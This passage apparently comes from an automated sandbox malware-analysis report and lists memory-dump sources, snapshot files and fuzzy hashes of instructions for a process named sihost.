                                      • Opcode Fuzzy Hash: ea3fbf2c3b069fa9ce8debd307ad95cc8965c5d58692c47e6d92e9baa162e4ad
                                      • Instruction Fuzzy Hash: 0DD1B474E01218CFDB54DFA5C894BADBBB2BF89300F2095AAD409A7359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42af9a88717f8c4fdab78f8892e4668433e0299614da5dc06451399379ef7bfe
                                      • Instruction ID: cb58cfc4076a3cf3f93149387a9cb2704bb7ca86d9f4f918aa0c4090cf03bd27
                                      • Opcode Fuzzy Hash: 42af9a88717f8c4fdab78f8892e4668433e0299614da5dc06451399379ef7bfe
                                      • Instruction Fuzzy Hash: F2D1A374E01218CFDB54DFA5C854BADBBB2BF89300F2491AAD409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624786798.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_4b0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f577bfa722754f466db8ebd82f11756355c421afde3bb7628258088670211f0d
                                      • Instruction ID: d9ea4a62512aa21dc7d497e052389b8933ef05608a3971563361799bcb1a8468
                                      • Opcode Fuzzy Hash: f577bfa722754f466db8ebd82f11756355c421afde3bb7628258088670211f0d
                                      • Instruction Fuzzy Hash: DBD1A474E012188FDB54DFA5C954BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e1a89c90608a5cb8f795daba3410db33add3029ff5d8b804e15d7028d28daae
                                      • Instruction ID: a7337b582cfc0fde02ab2d2da728b95d91195d1e6d0fe0a8b72796ef14da8d43
                                      • Opcode Fuzzy Hash: 2e1a89c90608a5cb8f795daba3410db33add3029ff5d8b804e15d7028d28daae
                                      • Instruction Fuzzy Hash: B4D1A374E012188FDB54DFA5C854BADBBB2FF89300F2091AAD409AB359DB355E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 48fe3c4c6fbde4dd83e99e13d3ef55111c65b49623f9357f7b8c75414b4b5ab6
                                      • Instruction ID: ca31243a80122348f54441e5e4e72219fb5441a721ca047beecb7449112a4b36
                                      • Opcode Fuzzy Hash: 48fe3c4c6fbde4dd83e99e13d3ef55111c65b49623f9357f7b8c75414b4b5ab6
                                      • Instruction Fuzzy Hash: 38D1A374E01218CFDB54DFA5C895BADBBB2BF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b61500690e29c9fcbb4e725bca68d33a826838498deb88f03bdcae7729e676bf
                                      • Instruction ID: 6331c7fd0d725a7f3c7adfdbf37f184d7497a087b31160dcdfcb0a956e1a8c4a
                                      • Opcode Fuzzy Hash: b61500690e29c9fcbb4e725bca68d33a826838498deb88f03bdcae7729e676bf
                                      • Instruction Fuzzy Hash: 82D1B274E012188FDB54DFA5D994BADBBB2FF89300F2081AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793e65714e0ff40188b2bcbcbfd1dd3d5853fcb1fffe66cfd40fb0907cccbad8
                                      • Instruction ID: ce646a6e18b15af97223b5fbc8ddb29b97b1970494861242c67b1fa189d8f383
                                      • Opcode Fuzzy Hash: 793e65714e0ff40188b2bcbcbfd1dd3d5853fcb1fffe66cfd40fb0907cccbad8
                                      • Instruction Fuzzy Hash: F0D1B274E012188FDB54DFA5C894BADBBB2FF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c0c1ba7290eae81427b45e078fa2f874d356c6dc438bcd5f57d15250053db95
                                      • Instruction ID: d4bad61f96fe0fb09d9227cbf1d3d1279bffdb4b2f1f66ef905c25a300c53416
                                      • Opcode Fuzzy Hash: 7c0c1ba7290eae81427b45e078fa2f874d356c6dc438bcd5f57d15250053db95
                                      • Instruction Fuzzy Hash: EED1B374E01218CFDB54DFA5C854BADBBB2BF89300F2091AAD409AB359DB359E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 773e094194135131469af254833d97b9c30b0b06692fca8cf0ea6e24eff3d6bf
                                      • Instruction ID: ed908a61200f732330623af8d707569bd78061b3780cfe514bc9da867712def8
                                      • Opcode Fuzzy Hash: 773e094194135131469af254833d97b9c30b0b06692fca8cf0ea6e24eff3d6bf
                                      • Instruction Fuzzy Hash: 48D1A274E012188FDB54DFA5C894BADBBB2FF89300F2091AAD409AB359DB355E81CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c3671ec644e34ebe1a74c5c034efd5989d9047e732fdb828cc2bd4182dd5135
                                      • Instruction ID: ea6ae4afcdb86b0793c11fd65dadc71bb1537d6d9a6bb34eda693bd180f6588b
                                      • Opcode Fuzzy Hash: 0c3671ec644e34ebe1a74c5c034efd5989d9047e732fdb828cc2bd4182dd5135
                                      • Instruction Fuzzy Hash: 76D1A474E012188FDB54DFA5C854BADBBB2FF89300F2091AAD409AB359DB359E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5a7eb6b29cd2db7d0287f2383465fdc6e54e3e0735a242d8e5b04c02c203c110
                                      • Instruction ID: 0ee1d30e0cc16f66824d2f69e1d3cdfa5ad9eb0ed133fd888cf4bb5c8b1071eb
                                      • Opcode Fuzzy Hash: 5a7eb6b29cd2db7d0287f2383465fdc6e54e3e0735a242d8e5b04c02c203c110
                                      • Instruction Fuzzy Hash: 7CD1A374E01218CFDB54DFA5C894BADBBB2BF89300F2091AAD409AB359DB355E81CF54
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 736a159a575b242497ec6e95bc203f56434957f2ebd8d05f0044931a5a6e0431
                                      • Instruction ID: 4df2bac8c91b443b03cb052ce4c449cf895ed99df0a1d2ee1ab232ac8934e19d
                                      • Opcode Fuzzy Hash: 736a159a575b242497ec6e95bc203f56434957f2ebd8d05f0044931a5a6e0431
                                      • Instruction Fuzzy Hash: FED1C374E012188FDB54DFA5D994BADBBB2FF89300F2081AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52973471626dd495ac5257f20765b16103b42e1ee27061e3e08c0b1ea14ee4c0
                                      • Instruction ID: 019a2affed8a519fd48f7ccd8670563f5f312e31121455d4f5f90f089aac3f66
                                      • Opcode Fuzzy Hash: 52973471626dd495ac5257f20765b16103b42e1ee27061e3e08c0b1ea14ee4c0
                                      • Instruction Fuzzy Hash: A9D1A374E012188FDB54DFA5C894BADBBB2FF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ea9dbbbcd60ef99ba9224c6543dfaf85e1d2318eff99fbc9703fd9860303e43a
                                      • Instruction ID: 335e4dddd9ebf926d4c15d55ebcb72c8d2846f3b2eea17d31f951097c17665d3
                                      • Opcode Fuzzy Hash: ea9dbbbcd60ef99ba9224c6543dfaf85e1d2318eff99fbc9703fd9860303e43a
                                      • Instruction Fuzzy Hash: 39D1A374E012188FDB54DFA5C854BADBBB2BF89300F2491AAD409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 746012153ba2b131aec2d4956ce551736bf743a0c14b9b892448418afbe296f8
                                      • Instruction ID: 7eb3acd992067ee44680e3994321e93770585a7941b2cd71aed28ca7343a8423
                                      • Opcode Fuzzy Hash: 746012153ba2b131aec2d4956ce551736bf743a0c14b9b892448418afbe296f8
                                      • Instruction Fuzzy Hash: CDD1A474E01218CFDB54DFA5C894BADBBB2BF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7440cbd9a846456b3f06a493e388181dbda316f65d0ce0bd6d429eae4ef82e03
                                      • Instruction ID: 4fce378cd6c46512e3189c3105e45f7a83de136edf96f098bed49aa8cbb567a5
                                      • Opcode Fuzzy Hash: 7440cbd9a846456b3f06a493e388181dbda316f65d0ce0bd6d429eae4ef82e03
                                      • Instruction Fuzzy Hash: 68D1B374E012188FDB54DFA5C894BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2866b29f207f0601f193a04cdf8bb95a76a25dc36aac822b7f72cba1ad69b1ea
                                      • Instruction ID: 4e7089c1ac8256caf67a10e3fa4fc528472e0e23e1a4d739729120135246ed19
                                      • Opcode Fuzzy Hash: 2866b29f207f0601f193a04cdf8bb95a76a25dc36aac822b7f72cba1ad69b1ea
                                      • Instruction Fuzzy Hash: C3D1B374E012188FDB54DFA5C894BADBBB2BF89300F2091AAD409AB359DB355E81CF51
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76d12a6edee839699253785750026323025d049b48ce8fa6ec7f7022d289b065
                                      • Instruction ID: d7375ef7a3556ebf9f5d115054722749623f925e92ee595eca09c8a1d727c49c
                                      • Opcode Fuzzy Hash: 76d12a6edee839699253785750026323025d049b48ce8fa6ec7f7022d289b065
                                      • Instruction Fuzzy Hash: B7D1A474E012188FDB54DFA5C894BADBBB2FF89300F2491AAD409A7359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec9d0521b3a2aed4b5b7107c2fe4d8da7b839bc3ad1ef4f71505306afa8bde40
                                      • Instruction ID: b090b74fdfce07e21f1e3cfed27db8470c0af75291431ea4375bf458a7bc0268
                                      • Opcode Fuzzy Hash: ec9d0521b3a2aed4b5b7107c2fe4d8da7b839bc3ad1ef4f71505306afa8bde40
                                      • Instruction Fuzzy Hash: F2D1A274E012188FDB54DFA5C894BADBBB2BF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76d1df2328edc38aee2fa50efb6f4ed47e92d3c9b7736c439078d408feff7624
                                      • Instruction ID: af9bf363fd6105496379d914c5a7f8c4dc316270e411fcb20f86faa774e26f84
                                      • Opcode Fuzzy Hash: 76d1df2328edc38aee2fa50efb6f4ed47e92d3c9b7736c439078d408feff7624
                                      • Instruction Fuzzy Hash: 5DD1B274E012188FDB54DFA5C994BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6f3dbab20b28c3d4a88f81a1096cabb80e27cb488c79160e4b023662c912c2e2
                                      • Instruction ID: 7999cf30977b63e21c5d0741a3e6ffa5a44663e233cfe3274a39b54101c4a7c4
                                      • Opcode Fuzzy Hash: 6f3dbab20b28c3d4a88f81a1096cabb80e27cb488c79160e4b023662c912c2e2
                                      • Instruction Fuzzy Hash: E9D1C474E012188FDB54DFA5C894BADBBB2FF89300F2481AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43655bf2e0c92b7e148cc126b26c1c3385e673958d2a2a440c66f663943973b2
                                      • Instruction ID: 8cc89e80a63a9f36013459115612066569786e9dd3d3ce6a68a54cf7df8213ab
                                      • Opcode Fuzzy Hash: 43655bf2e0c92b7e148cc126b26c1c3385e673958d2a2a440c66f663943973b2
                                      • Instruction Fuzzy Hash: C0D1C374E002188FDB54DFA5D994BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 611f68b24681449c602ac4a319023e000a5cf20abb6caec8835dcdec527301de
                                      • Instruction ID: 5e28d47585fbcce27d67e1c4e0b53e574fbe370641bb858b70a013cfa6fae4e6
                                      • Opcode Fuzzy Hash: 611f68b24681449c602ac4a319023e000a5cf20abb6caec8835dcdec527301de
                                      • Instruction Fuzzy Hash: BFD1B274E012188FDB54DFA5C894BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e132e760e983745632703c434daaf8439a45debee8e7209dbfcded31df93375
                                      • Instruction ID: 63a417241a6c6e84c0c22d561ba6cd85a4502f495ba58e728a2b15bb578b7be6
                                      • Opcode Fuzzy Hash: 9e132e760e983745632703c434daaf8439a45debee8e7209dbfcded31df93375
                                      • Instruction Fuzzy Hash: 23D1B474E012188FDB54DFA5C894BADBBB2BF89300F2091AAD409A7359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e5845dfc5a12b6e945dc6ed6d8941164c9ea81a3b969587e03d72be3e2c745d
                                      • Instruction ID: 3ad07322f3c96fbf1f2b902c5e193bb878acb395e0f1e34cd0066a77363931ed
                                      • Opcode Fuzzy Hash: 9e5845dfc5a12b6e945dc6ed6d8941164c9ea81a3b969587e03d72be3e2c745d
                                      • Instruction Fuzzy Hash: 77D1A374E012188FDB54DFA5C894BADBBB2FF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9aacfd53e3eaaf3ef80163becca878020a033b0a5d034ca4970de0c9eae63cc3
                                      • Instruction ID: 4c3ef8ab238d3b0d9cc88d007f8a21984f44e9e7572688d08462b6aab4fb3336
                                      • Opcode Fuzzy Hash: 9aacfd53e3eaaf3ef80163becca878020a033b0a5d034ca4970de0c9eae63cc3
                                      • Instruction Fuzzy Hash: 00D1A474E012188FDB54DFA5C854BADBBB2FF89300F2491AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 21549c98e59fb644f4615c2307b6c54d02d90a4b486ec435747df932a5494122
                                      • Instruction ID: abcda1a24fb52511006656b925fc076367f7ff7528b7b0211eb9b1a6cb594d06
                                      • Opcode Fuzzy Hash: 21549c98e59fb644f4615c2307b6c54d02d90a4b486ec435747df932a5494122
                                      • Instruction Fuzzy Hash: E0D1C078E00218CFDB55DFA5C950BADBBB2BF89300F2481A9D809AB359DB315E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f73d0e6661736ab0689d81d20aca7df115be646eb8227c399007be1d3e6f4513
                                      • Instruction ID: 88a556d12ba66148bcbcc45a543b5bac5ad0da099026415d4f7cef9869f6cdc6
                                      • Opcode Fuzzy Hash: f73d0e6661736ab0689d81d20aca7df115be646eb8227c399007be1d3e6f4513
                                      • Instruction Fuzzy Hash: 95D1C378E00218CFDB55DFA5D950BADBBB2BF89300F2491A9D809AB359DB315E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 116c8dbfcc47bc7a94db42a03d6d9c56fe2e130ce81aa059a4a0d21f44e2b2a6
                                      • Instruction ID: 7e7661bb5ac025b6961f08c480f684f3f2fab28ca4838756f27ac3b7ae23a23f
                                      • Opcode Fuzzy Hash: 116c8dbfcc47bc7a94db42a03d6d9c56fe2e130ce81aa059a4a0d21f44e2b2a6
                                      • Instruction Fuzzy Hash: FED1D378E00218CFDB55DFA5D950BADBBB2BF89300F2491A9D809AB359DB315E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 180962c0b8b3eac0d2074163cb1d21909e8f8d70ba03baac8c492394437d8619
                                      • Instruction ID: 87cb4ec73b975ef1c0b18817312cb529f3261419398bac9fb928f1383fbf4d8c
                                      • Opcode Fuzzy Hash: 180962c0b8b3eac0d2074163cb1d21909e8f8d70ba03baac8c492394437d8619
                                      • Instruction Fuzzy Hash: 27D1D378E00218CFDB55DFA5D950BADBBB2BF89300F2491A9D809AB359DB355E81CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 392e32c283605dc8d33f8a814f64b395c6bcf09ad0eb24a12b32ee5a1c6c1cce
                                      • Instruction ID: 058840d7ac3f970db1b930fc7cbf503039a517a93caa8f015d3907a940683a22
                                      • Opcode Fuzzy Hash: 392e32c283605dc8d33f8a814f64b395c6bcf09ad0eb24a12b32ee5a1c6c1cce
                                      • Instruction Fuzzy Hash: C4D1C278E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB315E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 286a51d51f71c6d8be21de86417a091db550a8f72da3fb8a1de3d26cbb31cdb2
                                      • Instruction ID: f79931d32a5046e9f61cb1fa104876b81dab783172ba38f9f8e34d9ac3d6ce40
                                      • Opcode Fuzzy Hash: 286a51d51f71c6d8be21de86417a091db550a8f72da3fb8a1de3d26cbb31cdb2
                                      • Instruction Fuzzy Hash: F4D1C278E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: fc975d99d34c26feb242e6c0e7bbc1d5cb4406fdecc1f56a27fc6c0a88476ff6
                                      • Instruction ID: 31aefaa36497984483f65e3cf2ddd44fac5be2fa7c2efa344655bad5b2cbf9ab
                                      • Opcode Fuzzy Hash: fc975d99d34c26feb242e6c0e7bbc1d5cb4406fdecc1f56a27fc6c0a88476ff6
                                      • Instruction Fuzzy Hash: 76D1C278E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 0bf9fa39cc9574d84fc685693a6a57d258babd0ea6a2ae181d4b61e33bf25b61
                                      • Instruction ID: cf8eaf90ae43e6372d45e7ee6c0a639d81f60bb9090d245390e100ee90a4526c
                                      • Opcode Fuzzy Hash: 0bf9fa39cc9574d84fc685693a6a57d258babd0ea6a2ae181d4b61e33bf25b61
                                      • Instruction Fuzzy Hash: 3CD1D278E00218CFDB54DFA5C950BADBBB2BF89300F2481A9D809AB359DB315E85CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 893be31223abb4fefd0d646f26cf195bf3ecf90205d695670dd2980da49410ce
                                      • Instruction ID: ad2275dcb5855f838854c57a26add929e8c923b52959a60d270abd2454f688b1
                                      • Opcode Fuzzy Hash: 893be31223abb4fefd0d646f26cf195bf3ecf90205d695670dd2980da49410ce
                                      • Instruction Fuzzy Hash: 9ED1B278E00218CFDB54DFA5C954BADBBB2BF89300F2491A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b9686344c872661f58e5af140e8b5b310619ba28945488b3d7b734df25bf31
                                      • Instruction ID: 9b2c95fec28205ced11d11e27e6903bdf355bb7603ed82b8d70ca6598d618dd3
                                      • Opcode Fuzzy Hash: 30b9686344c872661f58e5af140e8b5b310619ba28945488b3d7b734df25bf31
                                      • Instruction Fuzzy Hash: EED1D374E00218CFDB55DFA5C950BADBBB2BF89300F2481AAD809AB359DB355E81CF40
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2757dde3c55c30f1061a04d560e89672250565821d1a1a2afd99db4fe68506ba
                                      • Instruction ID: a9ae3f4e0c7201b7f7539f67f0e87577a34aab00c0140683ca4b3c83954ec7a2
                                      • Opcode Fuzzy Hash: 2757dde3c55c30f1061a04d560e89672250565821d1a1a2afd99db4fe68506ba
                                      • Instruction Fuzzy Hash: CBD1C378E00218CFDB54DFA5C954BADBBB2BF89300F2491AAD809AB359DB355D81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5853fe735f975f07f126f2ba39c7102414fe2192a9a30960f1d9c2df6514cf26
                                      • Instruction ID: 54f1140b24cb10c2efcb9714661f000ebf077ac285777f346174c528d14620bb
